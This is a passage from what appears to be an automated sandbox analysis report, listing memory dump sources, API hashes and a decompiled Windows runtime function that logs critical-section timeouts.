                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02F67A73,?), ref: 02F6D40B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: f55f1255bc22c68fc14e50c59f97e512230ea0e327e95603285ef877deb20f6c
                                                                                                                                    • Instruction ID: 90ee0430ec3fc5fc4d16b6ee64f2c1c1a3df07d7cecb89f887eb8bef7a92ea7a
                                                                                                                                    • Opcode Fuzzy Hash: f55f1255bc22c68fc14e50c59f97e512230ea0e327e95603285ef877deb20f6c
                                                                                                                                    • Instruction Fuzzy Hash: 2CB09B719424C5CAE615D76046087177944B7D5741F16C065E2020641A4778D0D1F5B6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			E0379FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                                    				void* _t7;
                                                                                                                                    				intOrPtr _t9;
                                                                                                                                    				intOrPtr _t10;
                                                                                                                                    				intOrPtr* _t12;
                                                                                                                                    				intOrPtr* _t13;
                                                                                                                                    				intOrPtr _t14;
                                                                                                                                    				intOrPtr* _t15;
                                                                                                                                    
                                                                                                                                    				_t13 = __edx;
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_t14 =  *[fs:0x18];
                                                                                                                                    				_t15 = _t12;
                                                                                                                                    				_t7 = E0374CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                                    				_push(_t13);
                                                                                                                                    				E03795720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                                    				_t9 =  *_t15;
                                                                                                                                    				if(_t9 == 0xffffffff) {
                                                                                                                                    					_t10 = 0;
                                                                                                                                    				} else {
                                                                                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                                    				}
                                                                                                                                    				_push(_t10);
                                                                                                                                    				_push(_t15);
                                                                                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                                    				return E03795720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                                    			}











                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0379FDFA
                                                                                                                                    Strings
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0379FE2B
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0379FE01
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                    • API String ID: 885266447-3903918235
                                                                                                                                    • Opcode ID: 991a2908f17a47cc70ccd3cf852aac41627c96044ad10ad11e5dfbf8d89cdaa3
                                                                                                                                    • Instruction ID: a5ee6147f933a532ddf49f40b1b18abffda2007d8dfcdd34110b8e23f17327f6
                                                                                                                                    • Opcode Fuzzy Hash: 991a2908f17a47cc70ccd3cf852aac41627c96044ad10ad11e5dfbf8d89cdaa3
                                                                                                                                    • Instruction Fuzzy Hash: C2F0F676240611BFEA219A45EC06F23BB6AEB45730F140319F6289A1D1DA62F92097F0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%